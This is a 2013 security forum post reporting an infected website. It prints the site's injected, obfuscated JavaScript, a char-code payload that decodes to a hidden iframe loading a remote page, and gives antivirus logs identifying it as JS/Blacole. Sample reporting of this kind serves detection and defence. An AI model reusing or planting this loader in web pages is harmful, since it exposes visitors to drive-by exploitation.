查看: 1519|回复: 0
收起左侧

[已鉴定] http://www.dairybids.com/categories.php?category=Miscellaneous

[复制链接]
fireold
发表于 2013-9-12 15:13:07 | 显示全部楼层 |阅读模式
  1. /*fde076*/
  2. asq = function() {
  3.     return n[i];
  4. };
  5. ww = window;
  6. ss = String["fro" + "mC" + "harC" + "o" + "de"];
  7. try {
  8.     document.body = ~1
  9. } catch (dgsgsdg) {
  10.     zz = 12 * 2 + 1 + 1;
  11.     whwej = 12;
  12. }
  13. if (whwej) {
  14.     try {} catch (agdsg) {
  15.         whwej = 0;
  16.     }
  17.     try {
  18.         document.body--;
  19.     } catch (bawetawe) {
  20.         if (ww.document) {
  21.             n = "0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x6f,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6f,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x68,0x6d,0x70,0x63,0x62,0x6d,0x77,0x66,0x6f,0x75,0x76,0x73,0x66,0x64,0x70,0x6f,0x74,0x70,0x73,0x75,0x6a,0x76,0x6e,0x2f,0x64,0x70,0x2f,0x76,0x6c,0x30,0x60,0x64,0x70,0x6f,0x75,0x66,0x6f,0x75,0x30,0x64,0x6f,0x75,0x2f,0x71,0x69,0x71,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x6f,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x6f,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x73,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x6f,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x6f,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x6f,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x6f,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67,0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x6f,0x28,0x2a,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x65,0x3e,0x5d,0x28,0x6f,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x6f,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x6f,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c".split(",");
  22.             h = 2;
  23.             s = "";
  24.             if (whwej) {
  25.                 for (i = 0; i - 467 != 0; i++) {
  26.                     k = i;
  27.                     s = s.concat(ss(eval(asq()) - 1));
  28.                 }
  29.                 z = s;
  30.                 ww["eval"]("" + s);
  31.             }
  32.         }
  33.     }
  34. } /*/fde076*/
复制代码


Avira
2013/9/12 下午 03:10 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\R8AOCKPW\main[1].js'
      包含病毒或有害的程式 'JS/Blacole.EB.33' [virus]
      已採取動作:
      檔案會移動至 '553ecbbe.qua' 名稱底下的隔離區目錄。.

2013/9/12 下午 03:10 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\SpryTabbedPanels[1].js'
      包含病毒或有害的程式 'JS/Blacole.EB.33' [virus]
      已採取動作:
      檔案會移動至 '4d90e468.qua' 名稱底下的隔離區目錄。.

2013/9/12 下午 03:10 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        815
      目錄數:        0
      惡意程式碼數:        2
      警告數:        0

2013/9/12 下午 03:09 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\TIHYMAU3\editor[1].js'
      包含病毒或有害的程式 'JS/Blacole.EB.33' [virus]
      已採取動作:
      檔案會移動至 '5401c4f3.qua' 名稱底下的隔離區目錄。.

2013/9/12 下午 03:09 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        814
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/9/12 下午 03:09 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\AVC3APW1\SpryMenuBar[1].js'
      包含病毒或有害的程式 'JS/Blacole.EB.33' [virus]
      已採取動作:
      檔案會移動至 '1eddbdd8.qua' 名稱底下的隔離區目錄。.

2013/9/12 下午 03:09 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        803
      目錄數:        0
      惡意程式碼數:        2
      警告數:        0

2013/9/12 下午 03:09 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\R8AOCKPW\categories[1].htm'
      包含病毒或有害的程式 'JS/Blacole.EB.33' [virus]
      已採取動作:
      發生錯誤,檔案未刪除。錯誤識別碼:26003.
      檔案無法刪除!.
      嘗試使用 ARK 程式庫執行動作。.
      檔案會移動至 '4c84eb74.qua' 名稱底下的隔離區目錄。.

2013/9/12 下午 03:09 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\TIHYMAU3\editor[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.33 [virus]'
      執行的動作:傳輸至掃描程式

2013/9/12 下午 03:08 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\TIHYMAU3\editor[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.33 [virus]'
      執行的動作:拒絕存取

2013/9/12 下午 03:08 [Web Protection] 發現惡意程式碼
      從 URL "http://www.dairybids.com/scripts/editor.js" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EB.33' [virus]。
      已採取動作:已略過

2013/9/12 下午 03:08 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\R8AOCKPW\main[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.33 [virus]'
      執行的動作:傳輸至掃描程式

2013/9/12 下午 03:08 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\SpryTabbedPanels[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.33 [virus]'
      執行的動作:傳輸至掃描程式

2013/9/12 下午 03:08 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\R8AOCKPW\main[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.33 [virus]'
      執行的動作:拒絕存取

2013/9/12 下午 03:08 [Web Protection] 發現惡意程式碼
      從 URL "http://www.dairybids.com/themes/ultra/main.js" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EB.33' [virus]。
      已採取動作:已略過

2013/9/12 下午 03:08 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\SpryTabbedPanels[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.33 [virus]'
      執行的動作:拒絕存取

2013/9/12 下午 03:08 [Web Protection] 發現惡意程式碼
      從 URL "http://www.dairybids.com/themes/ultra/SpryAssets/SpryTabbedPanels.js"
      存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EB.33' [virus]。
      已採取動作:已略過

2013/9/12 下午 03:08 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\AVC3APW1\SpryMenuBar[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.33 [virus]'
      執行的動作:傳輸至掃描程式

2013/9/12 下午 03:08 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\AVC3APW1\SpryMenuBar[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.33 [virus]'
      執行的動作:拒絕存取

2013/9/12 下午 03:08 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\R8AOCKPW\categories[1].htm 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.33 [virus]'
      執行的動作:傳輸至掃描程式

2013/9/12 下午 03:08 [Web Protection] 發現惡意程式碼
      從 URL "http://www.dairybids.com/themes/ultra/SpryAssets/SpryMenuBar.js" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EB.33' [virus]。
      已採取動作:已略過

2013/9/12 下午 03:08 [Web Protection] 發現惡意程式碼
      從 URL "http://www.dairybids.com/categories.php?category=Miscellaneous" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EB.33' [virus]。
      已採取動作:已略過



av.jpg




fs.jpg
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 08:44 , Processed in 0.124585 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表